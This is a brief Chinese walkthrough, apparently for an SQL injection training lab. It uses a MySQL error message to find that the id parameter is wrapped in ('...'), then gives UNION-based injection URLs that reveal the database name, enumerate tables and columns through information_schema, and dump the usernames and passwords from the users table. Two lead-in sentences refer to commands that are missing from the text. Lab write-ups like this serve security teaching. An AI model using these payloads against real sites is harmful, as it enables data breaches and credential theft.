在这之前先观察在mysql数据库上执行一条如下指令:
紧接着:
截至到目前我们发现,这个id已经有了三种形式,整数型 / ‘’ / (‘’)
我们可以根据这个特性来构造相应的payload
①:直接?id=’ 会爆出提示
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
因为这意味着sql查询语句使用的是:Select login_name, select password from table where id= (‘our input here’)
②:开始进行构造payload:
?id=-1%27)%20union%20select%201,database(),3--+ (搜集信息)
③:开始依据mysql高版本特性进行注入:
?id=-1%27)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+
?id=-1%27)union%20select%201,group_concat(username),group_concat(password)%20from%20security.users--+